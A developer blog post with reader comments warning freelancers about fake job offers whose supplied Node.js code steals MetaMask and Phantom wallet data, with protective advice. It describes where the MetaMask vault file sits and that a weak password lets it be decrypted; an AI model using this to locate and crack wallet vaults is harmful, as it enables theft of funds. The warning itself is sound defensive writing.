DEV Community

Block Experts
Block Experts

Posted on • Edited on

Every Blockchain Developer Must Know About This Scam!

🚨 Warning for Freelance Blockchain Developers: Beware of a New Scam!

Freelance developers, especially those working on blockchain and cryptocurrency projects, need to be vigilant about a new scam spreading across popular freelancing platforms. This scam involves a malicious Node.js script that scans a user’s storage and exfiltrates sensitive data, including browser wallet caches from extensions like Phantom and MetaMask.

I got this offers personally from Linkedin and Freelancer.com


🛑 How the Scam Works

  1. Fake Job Offer:

    • The scam begins when a "client" contacts a developer on platforms like LinkedIn, Upwork, or Fiverr with a seemingly legitimate job offer.
  2. Malicious Code Delivery:

    • After some discussions, the scammer provides a JavaScript or Node.js script for the developer to integrate into their project.
  3. Hidden Malicious Payload:

    • The script contains hidden code that:
      • Scans Local Storage: Looks for files or caches from browser wallet extensions like Phantom and MetaMask.
      • Extracts Sensitive Data: Gathers private keys, wallet addresses, or other critical information.
      • Exfiltrates the Data: Sends the stolen information to a remote server controlled by the scammer.

💥 The Impact

This scam is particularly dangerous because it targets developers who often work with sensitive financial data. By compromising a developer’s local environment, the scammer gains access to:

  • Cryptocurrency wallets.
  • Login credentials.
  • Other critical information stored on the system.

For developers using browser wallet extensions like Phantom and MetaMask, the consequences can be severe. Losing access to these wallets often results in substantial financial losses.


🛡️ How to Protect Yourself

Take these precautions to avoid falling victim to this scam:

  1. Thoroughly Review Client Requests:

    • Scrutinize any code provided by clients, especially if it accesses or manipulates local storage.
    • If you don’t fully understand the code, seek advice from peers or use online resources to verify its legitimacy.
  2. Use Sandboxed Environments:

    • Run untrusted code in a sandboxed environment or a virtual machine to prevent it from accessing your main system’s storage.
  3. Implement Security Best Practices:

    • Stay informed about the latest security threats targeting developers by following cybersecurity blogs, forums, and news outlets.

📊 What the Hacker Gets

Here’s an example of the kind of data a hacker can extract:

Image description

In the folder Metamask for example in image above, you’ll find a file named 000005.ldb or something similar. The exact number may vary, but it should be a low numerical value, such as 000004 or 000005. If the number is significantly higher, it is not the vault.

The hacker could decrypt that file if you’re not using a strong encryption password, potentially gaining access to your seed phrase—and as a result, you could lose your funds.

🔒 Conclusion

Do not run untrusted scripts on your main OS. Always use a virtual machine or Docker container with limited permissions to test potentially malicious code.

By staying vigilant and adopting secure practices, you can safeguard yourself and your projects from these scams. Stay safe! 🚀


🌟 Useful Tools for Blockchain Developers


Top comments (2)

Collapse
 
marksantiago02 profile image
Mark Santiago

Thanks for sharing valuable article.
Yeah, you are right.
Nowadays there are rise of scam projects on Upwork, Freelancer, and Linkedin.
They camouflaged themselves as a HR manager or CEO, and give you Github or Gitlab projects(mostly GitLab) and saying its part of hiring process.
They wanted to run the project locally and record videos.
In their code, especially backend code, there is an external API call for access all the files on Drive C.
They were trying to find secret keys or passwords, sth like that.
So we need to be aware of that.
In that sense, I think this article will be valuable for us.
Thanks again

Collapse
 
stevendev0822 profile image
Steven

I have also faced same sammers.
Thanks for shairng article